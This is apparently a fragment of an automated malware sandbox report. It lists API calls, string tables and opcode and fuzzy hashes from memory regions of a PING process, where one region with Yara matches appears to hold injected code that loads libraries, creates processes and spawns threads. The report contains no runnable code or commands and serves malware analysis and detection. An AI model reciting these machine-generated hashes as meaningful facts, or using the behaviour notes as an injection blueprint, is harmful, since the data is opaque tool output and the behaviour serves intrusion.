                                                      • Instruction Fuzzy Hash: 81110B75D4131AAFDB01DBE88C40BEFF7B8EF89200F048156D958AB142D7346606C7D5
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030918F0,030A6D77,030A4657,?), ref: 03097B63
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
                                                      • Instruction ID: 2a0e0164da82e817a6b7ef09764ba1d3131c10f27667234e60c1e78a4e61d495
                                                      • Opcode Fuzzy Hash: 50e719b33666c52ae451c32dedd5c396b53287c548881acf291c87044188a2f4
                                                      • Instruction Fuzzy Hash: F60126B6A563093EFF20E7F46C46FE763ACAF84210F0040D5A84CDB182E52195508BA4
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03094452
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction ID: 91648e861e8d8675adc9dd29a44604d3f8ffd7209816d019ac3f24339d3e8d92
                                                      • Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
                                                      • Instruction Fuzzy Hash: D20184B9E0120DBBDF10DBE4EC41FDDB3B89B44208F0481A5EA189B280F670EB15CB91
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,03097CE3,00000010,?,?,?,00000044,?,00000010,03097CE3,?,?,?), ref: 030A8453
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction ID: daab46f576c57f86d6ae320abcac573d0e0cfda7919803709c062870a282e239
                                                      • Opcode Fuzzy Hash: 35b01c1212d585122ab2bc1ded5d023e9505cf5357cb9f81e14728261203d902
                                                      • Instruction Fuzzy Hash: E301D2B6204209BFCB04DF8DDC80EEB77ADAF8C754F408208BA09E7240D630F8518BA4
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089685
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 19535f65b1070463ed8ee25af8bd2ca6c75952863c7127500a4beb3463429a41
                                                      • Instruction ID: 1cd7a8c3a51955a3ce8834149d514226a68a6646894267397c23316297f1d59f
                                                      • Opcode Fuzzy Hash: 19535f65b1070463ed8ee25af8bd2ca6c75952863c7127500a4beb3463429a41
                                                      • Instruction Fuzzy Hash: 38F0307724170436D220B6E9AC02FD7B69CDB80B61F150025F64DDA1C0D992B44143E8
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03089685
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 957c278ceb3319304d674fff95232ab587aff1413fd347f50b46867f1bb6586d
                                                      • Instruction ID: 0c1287183107c0a70b88b474c21307a7fd7bc175a06d2c921e9b2360e6d711b6
                                                      • Opcode Fuzzy Hash: 957c278ceb3319304d674fff95232ab587aff1413fd347f50b46867f1bb6586d
                                                      • Instruction Fuzzy Hash: 55F0657624170436D230B6E9DC02FD77698DFC0760F154019FA499F2C1D9A2B84183E8
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(03091609,?,030A4C23,03091609,030A4657,030A4C23,?,03091609,030A4657,00001000,?,?,030A9BE0), ref: 030A834C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction ID: e870cd2f601dad30d9b552a45d8d83c457f492501e14bb5d3983a976a01ec5e5
                                                      • Opcode Fuzzy Hash: b7f2757ac2d67da2e220e558bac8420130ef538032ac032da27c65484dfab29d
                                                      • Instruction Fuzzy Hash: E8E065766442087BE614EE98DC41FEB33ADEFC8710F004418FA08AB242C670B8118BF8
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,000038B9,00000007,00000000,00000004,00000000,03093CBA,000000F4,?,?,?,?,?), ref: 030A839C
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction ID: f1eaf0bb56ba806ba2a7658a9494c84aed7c4c34798c1667fec8abc61ddb069a
                                                      • Opcode Fuzzy Hash: 0112f9322e6f1835dd35a6fc29f2826ad6aaf91cfcf238a7f57362f68a7b31ae
                                                      • Instruction Fuzzy Hash: E0E03975640608BBD614EA58DC41EEB33ACEFC5710F004418FA08AB241CA30B8108AB5
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030918F0,030A6D77,030A4657,?), ref: 03097B63
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3080000_PING.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: da98180e7634d194589408875651a3a2623d42d674483f08f4c07e3d0359be56
                                                      • Instruction ID: 6965aaa4880d497ca6f99ed973e4b3b895fe311142cbf47520a79c5aa3837360
                                                      • Opcode Fuzzy Hash: da98180e7634d194589408875651a3a2623d42d674483f08f4c07e3d0359be56
                                                      • Instruction Fuzzy Hash: E4D05E7A6403087BF654F6E69C06F96368CAB80750F058464BA9CDB3C2EC56E01042A9
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                      • Instruction ID: 61dfe3f28fecd920ad6520eec8f37140209b9062e50be3e4db5aae14dee03f3e
                                                      • Opcode Fuzzy Hash: fca81bb6758094ff6d04b17958d7d1162f31538698a887c2baadf782e822253b
                                                      • Instruction Fuzzy Hash: F2B09B719015C5C9EE11F7A04A08717794567D1701F2DC4E2D303C645E4739C1D5E176
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300020657.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3660000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3558027158
                                                      • Opcode ID: e0efaff55d48faa27f74e1d69c746340d0e7305bac7b92809636c045addcc8c6
                                                      • Instruction ID: 96383d9fcb738baa9080f183073f0e1436a0893fff175fad81f5da449cd43555
                                                      • Opcode Fuzzy Hash: e0efaff55d48faa27f74e1d69c746340d0e7305bac7b92809636c045addcc8c6
                                                      • Instruction Fuzzy Hash: AE914FF04083988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                      • Instruction ID: 1b912dd3a13f2bbd974e255aada0555e6e8c2525d9c9cae456c0b28f16a1124e
                                                      • Opcode Fuzzy Hash: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                      • Instruction Fuzzy Hash: CC51B6B5A0011ABFDF24EBD8889097EF7B8BB4920071486E9E4A5D7741D278DE51CBE0
                                                      Strings
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B4742
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B46FC
                                                      • ExecuteOptions, xrefs: 038B46A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4725
                                                      • Execute=1, xrefs: 038B4713
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4787
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4655
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                      • Instruction ID: d86f42ffebd4b0be5bbd2fae0ad298b9b0d247feb255a2866e1823b46de18f84
                                                      • Opcode Fuzzy Hash: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                      • Instruction Fuzzy Hash: 6A51E735A003197AEF20EBE9DC85BFD77BAAB04304F1400E9E505EB281E771EA45CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300020657.0000000003660000.00000040.00000800.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3660000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DY[Z$E[$K3KZ$QX\E$[BK,$[EZ[$[[Z[$^E[K
                                                      • API String ID: 0-1533702992
                                                      • Opcode ID: 810e1de402e608b77b273fe881e42eaf7011821b1344b84983ce2ac31e57bb81
                                                      • Instruction ID: 0bd23b37e6c51b57436c28803f35dae6d2b7a79e80a9ba3a0467d70dfa61d108
                                                      • Opcode Fuzzy Hash: 810e1de402e608b77b273fe881e42eaf7011821b1344b84983ce2ac31e57bb81
                                                      • Instruction Fuzzy Hash: 4C11F2B0C14A4C8AEB25DFD4E5886DEFBB0FB04309F205158C06A7F295CB79954ACB85
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 764cebb482963a57e3baf4553fd2308e458a05d176caf75832413a9de5dff8eb
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: B981BC70E052499BDF26FFE8C8917AEBBA1AFC5360F1C46DAD861E7391C6349840CB51
                                                      Strings
                                                      • RTL: Re-Waiting, xrefs: 038B031E
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038B02BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038B02E7
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                      • Instruction ID: ddf065d11dbab4927dfa20dd64fce8f90ea985e09c83927cc4986b9c9539e311
                                                      • Opcode Fuzzy Hash: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                      • Instruction Fuzzy Hash: DCE1AD706087429FD725CFA8D884B6AB7E0BB89318F180A9DF6A5CB3D1D774D844CB52
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 038B7B8E
                                                      • RTL: Re-Waiting, xrefs: 038B7BAC
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038B7B7F
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                      • Instruction ID: 3bc4cd3b3c4753e60f1aaf1911a970da1ce8122d5f6255a0456d01747aca8328
                                                      • Opcode Fuzzy Hash: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                      • Instruction Fuzzy Hash: CD41E3353007469FDB25DEA8C840B6AB7E7EF89710F140A9DF95ADB380DB31E4068B91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038B728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038B7294
                                                      • RTL: Resource at %p, xrefs: 038B72A3
                                                      • RTL: Re-Waiting, xrefs: 038B72C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                      • Instruction ID: da4a4329f67ab53f743392e62314cd4cf6643976e6fd22d1153fb78682d34f0d
                                                      • Opcode Fuzzy Hash: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                      • Instruction Fuzzy Hash: 8541EF35600346ABD721DEA4CC41BAAB7B6FF84714F180699F9A6EB340DB31E942C7D1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 60d8aebe1ff4b24c05916ae39b04606133b09d3d4a5b3c90d2f708c73d1bf2ba
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: E591A271E0021A9BDF24EFEAC8806BEB7B5AF44724F78459AF865E72C4D7309940C721
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                      • Instruction ID: f7507b9bec8c78004f906bf28edc0007415c6a0d9dd654828a5dc2d2ca7d4fe1
                                                      • Opcode Fuzzy Hash: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                      • Instruction Fuzzy Hash: 3E8129B5D002699BDB31DB98CC44BEEB6B8AF08710F0445EAE919F7640D7709E84CFA1
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 038CCFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                      • Associated: 00000007.00000002.3300263133.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_3810000_PING.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 56155e1e631efced7ce43af1d0bd93e60e2ab3826fbf5f0490c268d8890b6723
                                                      • Instruction ID: f58227c3d838e742b8f9029c2518ef15365de472fbfca9516c3701d8cd3bf32a
                                                      • Opcode Fuzzy Hash: 56155e1e631efced7ce43af1d0bd93e60e2ab3826fbf5f0490c268d8890b6723
                                                      • Instruction Fuzzy Hash: 9E418BB5910258DFCB21EFE9C880AAEBBB8AF45B00F0444AAE915DB254E774D805CB65